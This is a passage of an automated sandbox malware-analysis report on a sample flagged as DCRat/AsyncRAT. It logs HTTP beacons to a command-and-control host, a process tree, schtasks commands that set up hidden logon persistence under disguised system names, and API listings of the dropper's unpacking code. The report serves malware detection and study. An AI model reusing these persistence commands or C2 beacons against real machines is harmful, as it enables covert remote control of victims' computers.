Jul 25, 2024 20:04:35.503451109 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:34 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jul 25, 2024 20:04:35.530765057 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:34 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jul 25, 2024 20:04:35.531452894 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:34 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49721	141.8.197.42	80	3476	C:\Windows\hh\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:41.131586075 CEST	498	OUT	GET /HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 Host: a0583448.xsph.ru Connection: Keep-Alive
Jul 25, 2024 20:04:41.933214903 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:41 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49722	141.8.197.42	80	3476	C:\Windows\hh\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:41.972640991 CEST	474	OUT	GET /HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 Host: a0583448.xsph.ru
Jul 25, 2024 20:04:42.679048061 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:42 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	14:03:56
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_442.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_442.exe"
Imagebase:	0x6e0000
File size:	2'294'465 bytes
MD5 hash:	519C9F6FEDEB43A8D129230FED9A2108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:03:56
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"
Imagebase:	0x4c0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:04:02
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:04:02
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:04:02
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"
Imagebase:	0xde0000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:04:03
Start date:	25/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WWanAPI\dwm.exe'" /rl HIGHEST /f
Imagebase:	0x7ff66cbb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:04:03
Start date:	25/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\user\jOMfQSwRhTi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff66cbb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:04:03
Start date:	25/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff66cbb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:04:03
Start date:	25/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\ShellNew\WinStore.App.exe'" /rl HIGHEST /f
Imagebase:	0x7ff66cbb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:04:03
Start date:	25/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\hh\explorer.exe'" /rl HIGHEST /f
Imagebase:	0x7ff66cbb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:04:04
Start date:	25/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Recovery\jOMfQSwRhTi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff66cbb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:04:04
Start date:	25/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat"
Imagebase:	0x7ff6e0fe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:04:04
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:04:04
Start date:	25/07/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff740c80000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:04:05
Start date:	25/07/2024
Path:	C:\Windows\System32\WWanAPI\dwm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WWanAPI\dwm.exe
Imagebase:	0x8b0000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:04:05
Start date:	25/07/2024
Path:	C:\Windows\hh\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\hh\explorer.exe
Imagebase:	0xa20000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:04:05
Start date:	25/07/2024
Path:	C:\Recovery\jOMfQSwRhTi.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\jOMfQSwRhTi.exe
Imagebase:	0xf80000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:04:09
Start date:	25/07/2024
Path:	C:\Windows\ShellNew\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\ShellNew\WinStore.App.exe"
Imagebase:	0x8c0000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:04:14
Start date:	25/07/2024
Path:	C:\Windows\System32\WWanAPI\dwm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WWanAPI\dwm.exe"
Imagebase:	0x990000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:04:23
Start date:	25/07/2024
Path:	C:\Recovery\jOMfQSwRhTi.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\jOMfQSwRhTi.exe"
Imagebase:	0x170000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:04:39
Start date:	25/07/2024
Path:	C:\Windows\hh\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\hh\explorer.exe"
Imagebase:	0x550000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1485
Total number of Limit Nodes:	31

Executed Functions

Function 006FD5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006F00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 006F00E4
Part of subcall function 006F00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 006F00F6
Part of subcall function 006F00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006F0127

Part of subcall function 006F9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 006F9DAC

Part of subcall function 006FA335: OleInitialize.OLE32(00000000), ref: 006FA34E
Part of subcall function 006FA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 006FA385
Part of subcall function 006FA335: SHGetMalloc.SHELL32(00728430), ref: 006FA38F

Part of subcall function 006F13B3: GetCPInfo.KERNEL32(00000000,?), ref: 006F13C4
Part of subcall function 006F13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 006F13D8

GetCommandLineW.KERNEL32 ref: 006FD61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 006FD643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 006FD654
UnmapViewOfFile.KERNEL32(00000000), ref: 006FD68E

Part of subcall function 006FD287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 006FD29D
Part of subcall function 006FD287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 006FD2D9

CloseHandle.KERNEL32(00000000), ref: 006FD697
GetModuleFileNameW.KERNEL32(00000000,0073DC90,00000800), ref: 006FD6B2
SetEnvironmentVariableW.KERNEL32(sfxname,0073DC90), ref: 006FD6BE
GetLocalTime.KERNEL32(?), ref: 006FD6C9
_swprintf.LIBCMT ref: 006FD708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 006FD71A
GetModuleHandleW.KERNEL32(00000000), ref: 006FD721
LoadIconW.USER32(00000000,00000064), ref: 006FD738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 006FD789
Sleep.KERNEL32(?), ref: 006FD7B7
DeleteObject.GDI32 ref: 006FD7F0
DeleteObject.GDI32(?), ref: 006FD800
CloseHandle.KERNEL32 ref: 006FD843

Strings

C:\Users\user\Desktop, xrefs: 006FD5E9
sfxname, xrefs: 006FD6B9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 006FD6F9
winrarsfxmappingfile.tmp, xrefs: 006FD637
xjs, xrefs: 006FD7CB
STARTDLG, xrefs: 006FD77E
sfxstime, xrefs: 006FD715

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjs
API String ID: 788466649-4123497350
Opcode ID: 2bc40627b11ac7fa5562c6725c3c130bdb69ed11bfd28d711b543780f7df29d1
Instruction ID: ff9e2e423f9373377643f50bce19cd8ba6242d5a457e3a19f740b76ff1cbb5ec
Opcode Fuzzy Hash: 2bc40627b11ac7fa5562c6725c3c130bdb69ed11bfd28d711b543780f7df29d1
Instruction Fuzzy Hash: D161F7B1900348BFD360AFB5EC49BBA37EEAB45741F008429F64592292DB7CD905C76A

Function 006F9E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(006FAE4D,PNG,?,?,?,006FAE4D,00000066), ref: 006F9E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,006FAE4D,00000066), ref: 006F9E46
LoadResource.KERNEL32(00000000,?,?,?,006FAE4D,00000066), ref: 006F9E59
LockResource.KERNEL32(00000000,?,?,?,006FAE4D,00000066), ref: 006F9E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,006FAE4D,00000066), ref: 006F9E82
GlobalLock.KERNEL32(00000000,?,?,?,?,?,006FAE4D,00000066), ref: 006F9E93
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 006F9EFC
GlobalUnlock.KERNEL32(00000000), ref: 006F9F1B
GlobalFree.KERNEL32(00000000), ref: 006F9F22

Strings

PNG, xrefs: 006F9E1F

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

